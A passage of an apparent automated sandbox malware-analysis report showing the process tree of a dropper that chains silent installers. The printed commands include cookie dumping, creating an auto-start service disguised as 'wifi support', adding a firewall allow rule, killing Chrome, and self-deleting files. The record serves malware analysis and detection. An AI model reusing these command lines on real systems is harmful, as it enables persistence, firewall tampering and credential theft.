                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\46-d3008-7a8-b77a7-3c36067cd93b5\Hygaewexugy.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\46-d3008-7a8-b77a7-3c36067cd93b5\Hygaewexugy.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:2092
                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                      5⤵
                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:2652
                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275457 /prefetch:2
                                                                                                                        6⤵
                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:2548
                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275476 /prefetch:2
                                                                                                                        6⤵
                                                                                                                          PID:4308
                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2652 CREDAT:275482 /prefetch:2
                                                                                                                          6⤵
                                                                                                                            PID:4476
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\49-f2f0d-fc8-e3bbe-fdec02b90e61d\Paeshudaepive.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\49-f2f0d-fc8-e3bbe-fdec02b90e61d\Paeshudaepive.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Modifies system certificate store
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1524
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aszrpkc4.zli\GcleanerEU.exe /eufive & exit
                                                                                                                          5⤵
                                                                                                                            PID:2980
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bp1qhsq3.md2\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                            5⤵
                                                                                                                              PID:2848
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nizrqclq.5zo\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                              5⤵
                                                                                                                                PID:2528
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nizrqclq.5zo\Setup3310.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\nizrqclq.5zo\Setup3310.exe /Verysilent /subid=623
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                  PID:1664
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-TEEVV.tmp\Setup3310.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-TEEVV.tmp\Setup3310.tmp" /SL5="$102E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\nizrqclq.5zo\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:2056
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-7HNAI.tmp\Setup.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-7HNAI.tmp\Setup.exe" /Verysilent
                                                                                                                                      8⤵
                                                                                                                                        PID:2032
                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:1960
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                              10⤵
                                                                                                                                                PID:3208
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                10⤵
                                                                                                                                                  PID:2176
                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                9⤵
                                                                                                                                                  PID:2336
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                    10⤵
                                                                                                                                                      PID:4072
                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                        taskkill /im RunWW.exe /f
                                                                                                                                                        11⤵
                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                        PID:3120
                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                        timeout /t 6
                                                                                                                                                        11⤵
                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                        PID:2844
                                                                                                                                                  • C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
                                                                                                                                                    "C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                    9⤵
                                                                                                                                                      PID:2708
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3VC2P.tmp\MediaBurner.tmp
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3VC2P.tmp\MediaBurner.tmp" /SL5="$304A6,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:2928
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-9VOSC.tmp\_____________bob.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-9VOSC.tmp\_____________bob.exe" /S /UID=burnerch1
                                                                                                                                                            11⤵
                                                                                                                                                              PID:3248
                                                                                                                                                              • C:\Program Files\Java\NONIGUABZF\ultramediaburner.exe
                                                                                                                                                                "C:\Program Files\Java\NONIGUABZF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:3628
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-PEACU.tmp\ultramediaburner.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-PEACU.tmp\ultramediaburner.tmp" /SL5="$30418,281924,62464,C:\Program Files\Java\NONIGUABZF\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:3632
                                                                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                        14⤵
                                                                                                                                                                          PID:3084
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8a-588b6-6a1-8e691-08283ad10f027\Bidejacudu.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\8a-588b6-6a1-8e691-08283ad10f027\Bidejacudu.exe"
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:3080
                                                                                                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:4264
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\42-e3e27-11c-fae9e-637ecd4b58f55\Paehadalaeshe.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\42-e3e27-11c-fae9e-637ecd4b58f55\Paehadalaeshe.exe"
                                                                                                                                                                          12⤵
                                                                                                                                                                            PID:2780
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hsjdrsy3.eng\GcleanerEU.exe /eufive & exit
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:4848
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d0twg3f0.ymi\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:4968
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yez00ugv.nfi\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:5080
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\yez00ugv.nfi\Setup3310.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\yez00ugv.nfi\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                      14⤵
                                                                                                                                                                                        PID:2336
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-GADLJ.tmp\Setup3310.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-GADLJ.tmp\Setup3310.tmp" /SL5="$105F2,138429,56832,C:\Users\Admin\AppData\Local\Temp\yez00ugv.nfi\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                          15⤵
                                                                                                                                                                                            PID:2176
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-9JU3V.tmp\Setup.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-9JU3V.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                              16⤵
                                                                                                                                                                                                PID:3608
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1uwflzgh.iq2\google-game.exe & exit
                                                                                                                                                                                          13⤵
                                                                                                                                                                                            PID:2372
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1uwflzgh.iq2\google-game.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\1uwflzgh.iq2\google-game.exe
                                                                                                                                                                                              14⤵
                                                                                                                                                                                                PID:952
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1uwflzgh.iq2\google-game.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1uwflzgh.iq2\google-game.exe" -a
                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                    PID:4292
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pdlnjuax.hru\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:4664
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kkp4jnay.ip2\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:4880
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yo1grwjk.0nd\toolspab1.exe & exit
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:5024
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ptdas1k.mbf\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                        PID:2808
                                                                                                                                                                                              • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:1444
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8693854.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8693854.exe"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:3556
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1372780.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1372780.exe"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:3620
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                            PID:3692
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2304221.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2304221.exe"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:3748
                                                                                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:2892
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-E6SLC.tmp\lylal220.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-E6SLC.tmp\lylal220.tmp" /SL5="$104AE,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:1396
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LQP7C.tmp\èeèrgegdè_éçè_)))_.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LQP7C.tmp\èeèrgegdè_éçè_)))_.exe" /S /UID=lylal220
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:3224
                                                                                                                                                                                                                  • C:\Program Files\Reference Assemblies\QRPLXPBORI\irecord.exe
                                                                                                                                                                                                                    "C:\Program Files\Reference Assemblies\QRPLXPBORI\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                      PID:3540
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5HDBC.tmp\irecord.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-5HDBC.tmp\irecord.tmp" /SL5="$10664,5808768,66560,C:\Program Files\Reference Assemblies\QRPLXPBORI\irecord.exe" /VERYSILENT
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                          PID:3288
                                                                                                                                                                                                                          • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                              PID:4916
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ed-9480b-b75-d0498-b902b364cf07b\Hinadumisho.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ed-9480b-b75-d0498-b902b364cf07b\Hinadumisho.exe"
                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                            PID:4820
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\69-e38b4-0ea-56e81-e60a5dfc4852b\Jicafinulae.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\69-e38b4-0ea-56e81-e60a5dfc4852b\Jicafinulae.exe"
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                              PID:3832
                                                                                                                                                                                                                      • C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                            PID:1692
                                                                                                                                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:2500
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ljroca0c.2av\google-game.exe & exit
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:2892
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ljroca0c.2av\google-game.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ljroca0c.2av\google-game.exe
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                          PID:2284
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ljroca0c.2av\google-game.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ljroca0c.2av\google-game.exe" -a
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:552
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cf3gepr.aix\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:2816
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5cf3gepr.aix\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5cf3gepr.aix\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                            PID:1884
                                                                                                                                                                                                                            • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:2556
                                                                                                                                                                                                                                • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:3192
                                                                                                                                                                                                                                • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                                                                                                                  "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:2168
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ux0me2rz.xkt\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:2768
                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\llrwrsau.f5p\toolspab1.exe & exit
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:2428
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\llrwrsau.f5p\toolspab1.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\llrwrsau.f5p\toolspab1.exe
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                        PID:2404
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\llrwrsau.f5p\toolspab1.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\llrwrsau.f5p\toolspab1.exe
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:4064
                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kccoudce.3pj\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:3368
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kccoudce.3pj\SunLabsPlayer.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\kccoudce.3pj\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:3396
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl8191.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:2396
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl8191.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:4684
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl8191.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:3360
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl8191.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4996
                                                                                                                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:4648
                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1712
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\207A.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\207A.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                PID:2008
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\207A.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\207A.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:1396
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\3ACE.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\3ACE.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                  PID:1756
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ppnzolrl\
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2260
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ickoypqz.exe" C:\Windows\SysWOW64\ppnzolrl\
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2316
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create ppnzolrl binPath= "C:\Windows\SysWOW64\ppnzolrl\ickoypqz.exe /d\"C:\Users\Admin\AppData\Local\Temp\3ACE.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:2356
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description ppnzolrl "wifi internet conection"
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2400
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start ppnzolrl
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2480
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:2544
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\5DCA.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\5DCA.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                              PID:1956
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:2412
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                    PID:2456
                                                                                                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:2464
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:2220
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-ARKSI.tmp\LabPicV3.tmp
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-ARKSI.tmp\LabPicV3.tmp" /SL5="$303DA,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2292
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-0PTI5.tmp\12(((((.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-0PTI5.tmp\12(((((.exe" /S /UID=lab214
